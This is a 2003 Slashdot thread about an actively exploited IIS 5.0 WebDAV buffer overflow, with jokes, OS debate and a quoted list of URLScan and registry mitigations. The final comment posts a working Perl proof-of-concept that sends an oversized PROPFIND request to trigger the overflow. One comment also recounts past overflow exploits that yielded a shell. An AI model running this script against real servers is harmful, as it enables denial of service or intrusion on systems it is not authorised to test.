Security Microsoft The Internet

WebDAV Buffer Overflow Attack Compromises IIS 5.0

rf0 writes "Well CERT is reporting a new overflow attack for IIS 5.0. Microsoft has released a bulletin. Better download those patches and fix another security hole." According to this CNET story, Microsoft says that this is already being exploited, at the very least since last Wednesday.
  • yup (Score:4, Funny)

    by Anonymous Coward on Monday March 17, 2003 @05:52PM (#5532118)
    (looks at watch) it's Monday again... time to go patch my IIS
    • Re:yup (Score:4, Funny)

      by Groo Wanderer ( 180806 ) <{charlie} {at} {semiaccurate.com}> on Monday March 17, 2003 @06:57PM (#5532665) Homepage
      Having to watch over a handful of IIS machines for several companies, I can say, with some authority, that if you only patch weekly, you are in trouble. MS often releases several critical patches per week, get on the ball.

      -Charlie

      (This was originally meant to be sarcasm, but then I went to the Windows Update and looked at the entire patch list, not the rollups. It really is as bad as I was thinking. As that great philosopher Pepe LaPew says, *LeSigh*.)
  • Patch? (Score:4, Funny)

    by Iamthefallen ( 523816 ) <Gmail name: Iamthefallen> on Monday March 17, 2003 @05:53PM (#5532119) Homepage Journal
    Better download those patches and fix another security hole.

    Well duh, "patch my IIS", it's Monday isn't it?

  • Ugh (Score:5, Informative)

    by wizarddc ( 105860 ) on Monday March 17, 2003 @05:53PM (#5532123) Homepage Journal
    WebDAV has been a headache for a long time, until I decided to just disable it altogether. I realized I never had a purpose for it, personally, so I added the disabling registry key [microsoft.com] to all my servers. If you know any good that WebDAV does, I'd like to know about it.
    • Comment removed (Score:5, Informative)

      by account_deleted ( 4530225 ) on Monday March 17, 2003 @05:57PM (#5532174)
      Comment removed based on user account deletion
      • Re:Ugh (Score:3, Insightful)

        by kjhambrick ( 111698 )
        .. cut ...

        Four things that make WebDav's so
        cool ...

        And don't forget to add ...

        WebDAV like SOAP makes it real easy
        for developers to sneak your data
        thru pesky firewalls using Port 80.

        That-a-Way, we can all share all our
        Corp Documents with the WFW ( Whole
        Effing World )

        -- kjh

    • Re:Ugh (Score:3, Informative)

      by Evil Grinn ( 223934 )
      If you know any good that WebDAV does, I'd like to know about it.

      Read the links in the posting:

      Microsoft Windows 2000 supports the World Wide Web Distributed Authoring and Versioning (WebDAV) protocol. WebDAV, defined in RFC 2518, is a set of extensions to the Hyper Text Transfer Protocol (HTTP) that provide a standard for editing and file management between computers on the Internet. A security vulnerability is present in a Windows component used by WebDAV, and results because the component contains an
    • Re:Ugh (Score:5, Interesting)

      by Mexican ( 323519 ) on Monday March 17, 2003 @06:16PM (#5532336)
      Is it just me, or did anyone happen to download and extract the patch and notice that it does not seem to contain the webdav .dll but just ntdll.dll? So is it really a patch to WebDav or for something in ntdll.dll that webdav relies on?
      • Re:Ugh (Score:5, Informative)

        by questionlp ( 58365 ) on Monday March 17, 2003 @06:49PM (#5532594) Homepage
        According to the Microsoft bulletin (here [microsoft.com]):
        What's wrong with the way IIS 5.0 handles WebDAV requests?

        WebDAV uses IIS to pass requests to and from Windows 2000. When IIS receives a WebDAV request, it typically processes the request and then acts on it. However, if the request is formed in a particular way, a buffer overrun can result because one of the Windows components called by WebDAV does not correctly check parameters.

        It sounds like WebDAV sends a malformed request back to the ntdll.dll for additional processing and possibly authentication (?) that is the problem. My guess is that the root of the problem is in ntdll.dll, but it could be mitigated by filtering WebDAV requests using the URLScan [microsoft.com] utility. More information can be had about 2/3 the way down in the same bulletin linked above.

        HTH

  • When they get a bug free Windows, they'll have to put some in just so bored /. readers have something to laugh at....
  • by Captain Beefheart ( 628365 ) on Monday March 17, 2003 @05:54PM (#5532132)
    I don't know why anyone uses it anymore. I'm switching back to Morse Code. Who's with me?
  • Again... (Score:3, Interesting)

    by Anonymous Coward on Monday March 17, 2003 @05:55PM (#5532149)
    A buffer overflow allowing an entire system takeover... Why is the code that the web server has access to change allowed to take over the system?
    • Re:Again... (Score:5, Funny)

      by zzxc ( 635106 ) on Monday March 17, 2003 @05:59PM (#5532194)
      >Why is the code that the web server has access to
      >change allowed to take over the system?

      Because it is "trusted".
    • Re:Again... (Score:3, Insightful)

      by GunFodder ( 208805 )
      Because otherwise it wouldn't be "integrated" into the OS and therefore might be an illegal attempt to use an existing monopoly to propagate another one (see IE for further details). Although it looks like IIS is too late and Apache has already won the day for open source.
  • Gartner Group (Score:5, Insightful)

    by 1010011010 ( 53039 ) on Monday March 17, 2003 @05:56PM (#5532156) Homepage
    If you listened to the Gartner Group, you stopped using IIS last year.

    If you didn't, well, get with the program!

    Eventually MSFT will have to deliver your "mission critical" ASP runtime for Apache, and the world will be a better place because of it.
  • Why use IIS? (Score:2, Insightful)

    All of these "patch" issues should be listed and sent to management with a recommendation of switching to a more secure *nix alternative. When will the truth beat out the Microsoft ad machine?
    • Re:Why use IIS? (Score:3, Flamebait)

      by Len ( 89493 )
      Would you also send them the list of Apache security alerts? [apacheweek.com] Or is that too much truth for you?
      • Aside from both of you being a little hopeful that anyone with a C and an O in their title would even read these missives from their proles . . .

        I'd send them a list of both, along with a list of patch availability time for each hole that was patched, and a list of holes that still remain unpatched.

        Frankly, the thing that steams my giblets the most about IIS is the unalterable GMT time-stamping on the W3C log format coupled with the inability to customize the other available (non-GMT stamping) log forma

      • by burgburgburg ( 574866 ) <splisken06NO@SPAMemail.com> on Monday March 17, 2003 @06:32PM (#5532455)
        Would you also send them the list of Apache security alerts [apacheweek.com]? Or is that too much truth for you?

        All seven of them? All long fixed? Page not updated since January 23, 2003? I'd LOVE to send them that. Comparing that to the long and varied string of IIS compromises/failures/destruction would be enough to get even the pointiest headed boss to make the switch. Good idea. Thanks!

        • I love that list of vulns for apache!

          Not only are they older, they almost all have one thing in common: they are for apache on Win32.

          Only one or two of the seven affected a UNIX platformed apache.

          It seems that the vulns for Win32 revolve around getting the '/' vs '\' right and how they do their path checking.
  • OMG! (Score:4, Funny)

    by Anonymous Coward on Monday March 17, 2003 @05:56PM (#5532160)
    Cue 2,000 microsoft bashing messages...
    • Re:OMG! (Score:5, Funny)

      by NewbieProgrammerMan ( 558327 ) on Monday March 17, 2003 @05:59PM (#5532193)
      I hope you don't have a static buffer allocated for those messages, because it'll....ummm...overflow. <ducks>
      • I hope you don't have a static buffer allocated for those messages, because it'll....ummm...overflow.

        If it was static (in the C sense), an overflow wouldn't smash the stack and there would be no exploit. ;-)

        • Re:OMG! (Score:3, Informative)

          by btellier ( 126120 )
          A joke, but just so other people are clear other segments of memory are vulnerable to overflows as well:

          - .bss section: for uninitialized data. In this exploit [securityfocus.com] I smashed a buffer in .bss space that ended up overwriting a function pointer in the .dtors section (IIRC, this was many years ago). Upon exit this function was called and ran a shell.

          - .data section: for initialized data. In this one [securityfocus.com] I was able to overflow a set of character pointers in the xlock (screensaver) program. By overflowing them with
  • Hi everybody! (Score:4, Insightful)

    by Anonymous Coward on Monday March 17, 2003 @05:56PM (#5532161)
    Slashdot is not the place you want to read about things like this, if you really need / want to be on the ball. You need to subscribe to bugtraq and nanog. You'd be surprised... it's like knowing the future!
  • by obotics ( 592176 ) <remline@hotmail.com> on Monday March 17, 2003 @05:56PM (#5532162) Homepage
    Wow! Microsoft already has a patch released? Not bad at all!

    Well, if they are going to have bugs, it is not that bad of a thing as long as they are patched promptly. Then again, many admins do have a tendency to run unpatched machines.


    • Well, if they are going to have bugs, it is not that bad of a thing as long as they are patched promptly. Then again, many admins do have a tendency to run unpatched machines.

      Many of these unpatched boxes are even windows machines. ;)
      (No, I'm not slamming windows, or *n?x; but bad admin practices.)
    • Don't be! (Score:5, Insightful)

      by FreeLinux ( 555387 ) on Monday March 17, 2003 @06:13PM (#5532317)
      The exploit has been in the wild since last Wednesday. Microsoft has known about it since that time. Five days to a patch is really good for Microsoft but, the last Apache bug was fixed on the day of discovery, long before any exploits appeared.
      • by Groo Wanderer ( 180806 ) <{charlie} {at} {semiaccurate.com}> on Monday March 17, 2003 @07:03PM (#5532707) Homepage
        The problem with this patch is that it wasn't found by a white hat and submitted. It was discovered by people getting hacked and calling MS asking WTF. In cases like that, 5 days isn't really that bad. In cases where an exploit, along with vulnerability code, and a description are fed to devs on a platter, open source or not, it makes the task 10x easier. When you have to figure out what is going on while under fire, and in a hurry, things get messy. That said, you can hack a lot of systems in 5 days with the right script.

        -Charlie
    • by joyoflinux ( 522023 ) <thejoyoflinux AT yahoo DOT com> on Monday March 17, 2003 @06:30PM (#5532437)
      Some admins run unpatched machines because they're more scared of what damage the patch will do than the security hole...
  • by wumarkus420 ( 548138 ) <wumarkus@h o t mail.com> on Monday March 17, 2003 @05:57PM (#5532169) Homepage
    It looks like this was the exploit used to hack into an Army machine recently. Check out the link from MSNBC here [msnbc.com].
  • by OffTheLip ( 636691 ) on Monday March 17, 2003 @05:58PM (#5532180)
    I was ready to uninstall IIS when it occurred to me that Exchange 2K needs it. I was ready to uninstall Exchange 2K when I realized users would not be able to function. Whew, luckily I came to my senses...
  • Q: WebDAV is Real? (Score:3, Interesting)

    by 4of12 ( 97621 ) on Monday March 17, 2003 @05:58PM (#5532185) Homepage Journal

    So is this any kind of standard WebDAV [webdav.org] or just a particular proprietary implementation of similar features in IIS?

    I've always been curious about this technology. At one point I even heard talk of a "WebDAV filesystem", but haven't heard of it taking off in any big way yet.

    • by greed ( 112493 ) on Monday March 17, 2003 @06:29PM (#5532433)
      I've mounted WebDAV filesystems with my iBook, served by a Solaris machine with Apache and subversion. Even mounts under /Volumes, so programs don't even need to be aware of it; the XP "redirector" would fill this same role. (UNIX people can think "virtual filesystem switch" when you hear "redirector".)

      If you just want a DAV filesystem, see mod_dav_fs in any recent Apache. (Which DOES run on Windows, for everyone who wants to toss the OS out with the webserver. Not that I'm a fan of Windows for anything, but you can run non-MS servers on the thing.)
  • by expro ( 597113 ) on Monday March 17, 2003 @06:00PM (#5532201)

    It seems quite likely to me that that was an under-reported version of this incident [msnbc.com] reported on MSNBC, that permitted an intruder with apparent quite-hostile intent onto US Army sites.

  • by KingDaveRa ( 620784 ) on Monday March 17, 2003 @06:00PM (#5532208) Homepage
    So, ok, this is a bug. A serial vulnerability. It could lead to a server being crippled. It's all Microsoft's fault. It's crap software. Etc Etc.

    Now, I'm no anti-any OS, I like them all, but what about the latest Sendmail vuln? Or even the one in older versions of BIND? Isn't it true to say that ALL OSes are equally as vulnerable? During the brief time I was on the Redhat Network, I got at least two or three updates a day telling me the sky was about to fall in if I didn't patch my server soon.

    I treat all servers fairly, regardless of background, age or reliability :-)

    • by Anonymous Coward on Monday March 17, 2003 @06:25PM (#5532398)

      The best way to evaluate this bug is to consider an equivalent attack against competitors. In this case, the main competitor is Apache.

      Cracking Apache in this way would not give you root. While you might be able to get root by using some other local exploit, it's not the slam-dunk that it is on Windows.

      Furthermore, careful admins can run Apache in a sandbox called a "chroot". Properly set up, this means that the attacker can't get to the rest of the system; all they can play with is the Web site.

      So, in summary:

      It's all Microsoft's fault. It's crap software.

      That's a pretty good assessment. The bug itself is a mistake lots of other people have made, but the severity of the mistake isn't.

  • by huhmz ( 216967 ) on Monday March 17, 2003 @06:05PM (#5532247)
    If CERT would just move their headquarters to the IIS devs room in redmond, that would probably save a lot of money for CERT. They should be a part of the regular IIS dev team.
  • Where I work, someone hacked a web server with this over the weekend, and I had just finished checking that it was because of something related to FrontPage or DAV when I saw this article. I was about to set fire to the administrators of that server, but at least that was not entirely their fault.

    That could count as a really big argument against not disclosing vulnerabilities as soon as possible? I don't know since when Microsoft is aware of this and making the patch, but if it have time to be developed an exploit

    • Microsoft learned of the vulnerability after online hackers used the flaw to breach the security of a customer's Web servers last Wednesday
      Looks like "black hats" were the first to find this bug, at least according to C|NET.
  • by Anonymous Coward on Monday March 17, 2003 @06:07PM (#5532270)
    It says near the bottom that IIS systems with URL scan which is part of the lockdown utility are not affected by this.

    Why would you run a IIS server without using the lockdown utility??

    We (large corporation) have been using IIS servers and without a problem. With Lockdown/urlscan there are no problems at all. The logs show people trying to get in but being rejected.

    I think this story is a bit overblown. It appears that most /.'s don't like microsoft and thats sad because microsoft is the driving company behind many many jobs. The arrival of windows pushed the last boom. No questions about that. Unix had been around for 20 yrs and no boom. Windows and the net and look at how things accelerated..why..because ma/pa people use windows..not *nix. Just the facts.

    cheers
    John
    • by expro ( 597113 ) on Monday March 17, 2003 @06:33PM (#5532470)

      Your first three paragraphs were quite good and interesting.

      Your fourth is full of idiocy.

      I think this story is a bit overblown.

      Umm, not at all. It is quite a serious incident.

      It appears that most /.'s don't like microsoft

      Tell me, is this the first time you noticed that? Not much analytical thought going on upstairs, is there?

      and thats sad because microsoft is the driving company behind many many jobs

      They suck a very disproportionate chunk of money out of the market, they are in a position where innovation is much too risky, they are in such a controlling position that they are even greatly profitable against the trend of the rest of the market. The IBM PC pushed the boom. DOS and Windows have ridden the wave and placed Microsoft in the position of punishing any software company and they keep expanding -- that becomes too successful in the name of feeding their monstrous appetite. DOS and Windows sucked for many years, but were small and people ignored the control that was being given such an unworthy producer.

      They drive their own jobs with lots of marketing and billions to spend on research, which would be much better used in a large market of competing thriving software vendors, like we had before Microsoft used monopolistic business models to destroy them all. If you become successful, Microsoft is guaranteed to take it away from you. That is successful for Microsoft and creation of Microsoft jobs, but far from good for America or the world.

      The arrival of windows pushed the last boom. No questions about that. Unix had been around for 20 yrs and no boom. Windows and the net and look at how things accelerated..why..because ma/pa people use windows..not *nix. Just the facts.

      You mentioned facts? The boom came on the backs of now-defunct companies who pioneered their fields, such as word processing, networking, compilers, OO Languages, etc. none of which was pioneered by Microsoft. But Microsoft was good at using software ownership to take these things away from their innovators. And now you have come full circle to why many developers are congregated here and do not always hold Microsoft in high regard.

      But you knew that, didn't you? Perhaps you are AC because your large company is Microsoft?

    • I think this story is a bit overblown. It appears that most /.'s don't like microsoft and thats sad because microsoft is the driving company behind many many jobs.

      Uhm, you do realize that this is Slashdot, right? Of course you do... you cite /. right there. I'm confused here. I feel like someone just told me the sky is blue.

      You are right though, Microsoft products can be secure. Just like Linux products can be insecure. The difference is in the default.
    • The arrival of windows pushed the last boom. No questions about that.

      Yeah, that's why the stock everyone was talking about in 1995 was netscape communications corp. The WEB was the last boom. No questions about that.
    • >Unix had been around for 20 yrs and no boom.

      The PC boom was dependent on the web/internet boom. Any OS can run a browser, it just happened that Microsoft was the de facto standard on the PC platform at the time.

      If you want to thank anyone for ushering the information age you can start with UIUC's NCSA and Tim Berners-Lee.
    • ummm, while i agree slashdot is slanted against microsoft, you can't say 'windows' pushed a boom. it pushed a new market, yes. but thats like claiming any invention that has widespread use caused the world to become something new. no shit, the product was new. unix didnt have desktop use, no. but who the hell do you think has been running the corporate machines the past 30 years? who do you think is still relied upon for the real important data crunching. it aint win2k thats for sure. dont confuse a new mar
    • Why would you run a IIS server without using the lockdown utility??

      Good point. However, my company advises our clients against running it, mainly because their sysadmins are...not well versed in the arts of running a windows web server. The default configuration for the lockdown tool shuts down everything except for HTML. That includes the ASP engine, which our product requires. If the sysadmin spends a few minutes to go through the list of what to disable and what not to, they're fine.

      Sadly, our c

  • by mattsouthworth ( 24953 ) on Monday March 17, 2003 @06:09PM (#5532285) Journal
    I've asked this everywhere, maybe someone will answer.

    The MS advisory states that a 'default' URLScan will protect against this. Well ... We don't run the default config. We've customized it, as have many shops. I can't find information on _which_ aspects of URLScan provide the protection - I'd like to know if our customizations have left us out in the breeze.

    Anyone know?

    • by mattsouthworth ( 24953 ) on Monday March 17, 2003 @06:15PM (#5532323) Journal
      A-ha! More info posted to NTBugtraq (after my original posting..)

      Quote:
      Just to clarify, Microsoft's bulletin states that this vulnerability
      could have been prevented using URLScan and/or IISLockdown, but it
      isn't really specific on how to do this. Several people have asked me
      how this can be done.

      The following steps can be used to block the attack:

      1. Completely disable WebDAV by setting the
      HKLM\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\DisableWebDAV
      registry key to 1

      2. Limit the length of requests (the url and any headers) by setting
      the HKLM\SYSTEM\CurrentControlSet\Services\w3svc\parameters
      MaxClientRequestBuffer to something like 16k

      3. Block the following WebDAV HTTP verbs using URLScan (either by
      specifically blocking them or by not listing them as allowed):
      OPTIONS, PROPFIND, PROPPATCH, MKCOL, DELETE, PUT, COPY, MOVE, LOCK,
      UNLOCK, OPTIONS, and SEARCH. Note that FrontPage does require the
      OPTIONS method to work properly.

      4. Block the following WebDAV-related headers using the [DenyHeaders]
      section of URLScan.ini:
      [DenyHeaders]
      DAV:
      Depth:
      Destination:
      If:
      Label:
      Lock-Token:
      Overwrite:
      TimeOut:
      TimeType:
      DAVTimeOutVal:
      Other:

      5. If you require WebDAV, you can limit the
      length of each individual header with these entries in the
      [RequestLimits] section (The exact values are obviously pretty
      generic and may need to be increased or decreased based on your
      particular configuration):
      [RequestLimits]
      Max-DAV=250
      Max-Depth=250
      Max-Destination=250
      Max-If=250
      Max-Label=250
      Max-Lock-Token=250
      Max-Overwrite=250
      Max-TimeOut=250
      Max-TimeType=250
      Max-DAVTimeOutVal=250
      Max-Other=250

      Microsoft does not specifically state which HTTP Verb and/or header
      is affected, but it does say that it is related to WebDAV. I would
      therefore assume that setting ACLs on httpext.dll would still be
      effective in blocking the attack. The PUT and DELETE methods are
      still available in IIS, but only as part of the original HTTP spec,
      not part of WebDAV.

      Mark Burnett
      www.iissecurity.info
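
For anyone in the position described above, running a customised URLScan.ini and unsure whether it still covers steps 3 to 5 of the quoted post, the following is an added example (not part of the NTBugtraq post and not Microsoft's code) that audits a URLScan.ini against the verb and header lists given there. The function names and the sample file are constructed for illustration; it assumes `UseAllowVerbs` defaults to 1 when absent and that a `Max-` limit of 0 means "no limit".

```python
import re

# Verbs and headers exactly as listed in steps 3 and 4 of the quoted post.
WEBDAV_VERBS = {"OPTIONS", "PROPFIND", "PROPPATCH", "MKCOL", "DELETE", "PUT",
                "COPY", "MOVE", "LOCK", "UNLOCK", "SEARCH"}
WEBDAV_HEADERS = ["DAV", "Depth", "Destination", "If", "Label", "Lock-Token",
                  "Overwrite", "TimeOut", "TimeType", "DAVTimeOutVal", "Other"]

# Constructed sample of a locally customised URLScan.ini (not from the page).
SAMPLE_INI = """\
[options]
UseAllowVerbs=1      ; 1 = use [AllowVerbs], 0 = use [DenyVerbs]

[AllowVerbs]
GET
HEAD
POST
OPTIONS              ; kept because FrontPage needs it
PROPFIND             ; added by a local customisation

[DenyHeaders]
Translate:
If:
Lock-Token:
Destination:

[RequestLimits]
Max-DAV=250
Max-Depth=250
"""


def parse_urlscan(text):
    """Return {lower-cased section name: [entries]} with ';' comments removed."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            current = header.group(1).strip().lower()
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def key_values(entries):
    """Turn 'Name=Value' entries into a dict keyed by lower-cased name."""
    pairs = {}
    for entry in entries:
        if "=" in entry:
            name, value = entry.split("=", 1)
            pairs[name.strip().lower()] = value.strip()
    return pairs


def audit_webdav(text):
    """Report WebDAV verbs still reachable and WebDAV headers left unbounded."""
    cfg = parse_urlscan(text)
    options = key_values(cfg.get("options", []))
    # Assumption: allow-list mode is in effect unless UseAllowVerbs=0 is set.
    allow_mode = options.get("useallowverbs", "1") != "0"
    # Simplification: verbs are compared case-insensitively in both modes.
    if allow_mode:
        listed = {v.upper() for v in cfg.get("allowverbs", [])}
        exposed = WEBDAV_VERBS & listed
    else:
        listed = {v.upper() for v in cfg.get("denyverbs", [])}
        exposed = WEBDAV_VERBS - listed

    denied = {h.rstrip(":").strip().lower() for h in cfg.get("denyheaders", [])}
    limits = key_values(cfg.get("requestlimits", []))
    unbounded = []
    for header in WEBDAV_HEADERS:
        limit = limits.get("max-" + header.lower(), "")
        # Assumption: 0 means "no limit", so only a positive value is a bound.
        bounded = limit.isdigit() and int(limit) > 0
        if header.lower() not in denied and not bounded:
            unbounded.append(header)
    return {"exposed_verbs": sorted(exposed), "unbounded_headers": unbounded}


if __name__ == "__main__":
    report = audit_webdav(SAMPLE_INI)
    print("WebDAV verbs still accepted:", report["exposed_verbs"])
    print("WebDAV headers neither denied nor length-limited:",
          report["unbounded_headers"])
```

An empty result only covers the URLScan settings in steps 3 to 5; the registry values in steps 1 and 2 live outside URLScan.ini and are not checked here.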
  • Exploited! (Score:5, Funny)

    by DarkHelmet ( 120004 ) <mark&seventhcycle,net> on Monday March 17, 2003 @06:11PM (#5532298) Homepage
    Microsoft says that this is already being exploited, at the very least since last Wednesday.

    And I thought that Penguin on the Microsoft home page looked a little out of place.

  • timely patches (Score:2, Interesting)

    by boarder ( 41071 )
    I think one critical issue with the timings of patch releases is stated right up there in the post: exploits are already out and about... for 3 days!

    I'm not bashing either side because *nix has its security issues, too; but last time I saw an exploit with Linux, there was a patch well before any known exploits. I'm not saying the patches to Linux were made before the bug was made public, just that they were available before the bug was exploited.

    If there is some cracker out there that has found this bug,
  • by Anonymous Coward
    At least they noticed that an exploit exists. Sure, it may take a little while to make a patch, but at least there will be a fix soon. Hopefully, this should increase the overall security of IIS, which would of course be a good thing.

    Why, you may ask, would it be good for one of Apache's competitors to be less buggy (assuming you are arguing from a pro-open source standpoint)? This gives Apache competition. The more competition it has, the more incentive many of its developers will have to improve it.
  • ... instead of having stories like these every two or three weeks just automatically reposted the same story? Really.... IIS vulnerabilities are being discovered so often these days that it doesn't even feel like news anymore.
  • by blueZhift ( 652272 ) on Monday March 17, 2003 @06:28PM (#5532418) Homepage Journal

    In a future near you...

    By order of John Ashcroft, Dick Cheney, and Bill Gates, Windows bugs are now a matter of national security. All discussion in this thread is to stop immediately!

    ---

    Seriously, with the Army getting hacked and the continued insistence of elements of the govt and military to use Windows, soon bugs and exploits will be classified as state secrets and we'll stop hearing about them. Soon enough vested FBI agents will be knocking on the door of anyone who opens their mouth...excuse me, someone's at the door...

    =======rrrrtwjstoah;!!!!!!!!!

  • by TheNarrator ( 200498 ) on Monday March 17, 2003 @06:32PM (#5532462)
    http://www.msnbc.com/news/886524.asp?0cv=CB20

    March 17 -- A computer intruder armed with a secret, particularly effective attack tool recently took control of an Army Web server, MSNBC.com has learned. Both Microsoft and the CERT Coordination Center released hastily-prepared warnings about the vulnerability that led to the attack on Monday. But it was a disturbingly successful attack, experts say, because the intruder found and exploited a flaw that took security researchers completely by surprise.
  • by dze ( 89612 )

    I just ran into a problem today on one of our development web servers, trying to get an ASP to run a windows shell script with particular permissions. Anyway, executing arbitrary code in the Local System Context -- this is just the feature that I've been looking for!

  • Quite handy solution (Score:5, Informative)

    by decarelbitter ( 559973 ) on Monday March 17, 2003 @06:36PM (#5532490)
    If you have to use IIS for some reason, put a Squid proxy [squid-cache.org] running on your favorite OS in front of it. It will save you a lot of trouble.
  • by Wolfier ( 94144 ) on Monday March 17, 2003 @06:54PM (#5532642)
    Incompetent sysadmins still are the weakest link.

    Take a look at the World Health Organization South-East Asia web site:

    http://w3.whosea.org/index.htm

    They're running IIS 4.0. FOUR.POINT.ZERO.

    The deface has been there for almost a day with apparently no fix yet :(
    • by the eric conspiracy ( 20178 ) on Monday March 17, 2003 @07:10PM (#5532770)
      Incompetent sysadmins still are the weakest link.

      I don't agree with that. Microsoft itself can't keep up with the patch schedules; its servers regularly get hacked. Who has more resources than Microsoft? Nobody.

      The fact is that if you are running a mission critical server you must test before deploying a patch. That takes time and money that the IT group has in short supply these days.

      Then there is the issue of Microsoft's marketing - they sell IIS as the easy to use 'zero maintenance' lowest TCO choice. False advertising in this case.

  • Windows Update (Score:3, Informative)

    by fudgefactor7 ( 581449 ) on Monday March 17, 2003 @06:56PM (#5532657)
    You know, if people periodically checked Windows Update, this would not be that big of a deal; additionally, if you have SP3 installed you can tell it to automagically install any critical updates for you without prompting. Case solved.
  • Editorial bias? (Score:5, Insightful)

    by m00nun1t ( 588082 ) on Monday March 17, 2003 @07:11PM (#5532784) Homepage
    Sure, another MS exploit. Seems to be one almost every week, and it sucks.

    What I do find interesting is that /. chose to post this article, but reject an article I submitted yesterday about a very serious security hole in Opera [internetnews.com] - Opera describe it as "extremely critical".

    I'm not griping about having my story rejected, I've had many rejected and a few accepted, and that's the way things are, no problem. What I am questioning is the editorial bias. Here we are at a website which probably has one of the highest concentration of Opera users of any website in the world, and they chose to not post a negative story about "the good guys" (which has exploits in the wild) but did choose to post a negative story about "the bad guys".

    Just more of /. displaying an unfair bias?
  • by Chester K ( 145560 ) on Monday March 17, 2003 @08:29PM (#5533299) Homepage
    While this makes the front page so we can all have our obligatory cracks at Microsoft, a similar (and just as important!) remote root exploit in Samba was just fixed [theregister.co.uk] today.
  • Thanks guys! (Score:3, Interesting)

    by Matey-O ( 518004 ) <michaeljohnmiller@mSPAMsSPAMnSPAM.com> on Monday March 17, 2003 @09:48PM (#5533687) Homepage Journal
    In your enthusiasm to slam Microsoft, I get a Really Good Feel for when a patch is critical or not. It lets me ignore the servers until a front page Slashdot article shows up.

    So, Danke!
  • by thedji ( 561789 ) <dotslasl@wiCOUGARcked.dj minus cat> on Tuesday March 18, 2003 @03:05AM (#5535003) Homepage
    Test your server...

    #!/usr/bin/perl
    # Written by Georgi Guninski
    use IO::Socket;
    print "IIS 5.0 propfind\n";
    $port = @ARGV[1];
    $host = @ARGV[0];
    sub vv()
    {
    $ll=$_[0]; #length of buffer
    $ch=$_[1];
    $over=$ch x $ll; #string to overflow
    $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return;
    #$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."$over".':"><a:prop ><a:displayname />'."<u:$over />".'</a:prop></a:propfind>'."\n\n";
    # ^^^^ This is another issue and also works with length ~>65000
    $xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."over".':"><a:prop><a:displayname />'."<u:$over />".'</a:prop></a:propfind>'."\n\n";
    $l=length($xml);
    $req="PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
    syswrite($socket,$req,length($req));
    print ".";
    $socket->read($res,300);
    #print "r=".$res;
    close $socket;
    }
    do vv(128008,"V"); # may need to change the length
    sleep(1);
    do vv(128008,"V");
    print "Done.\n";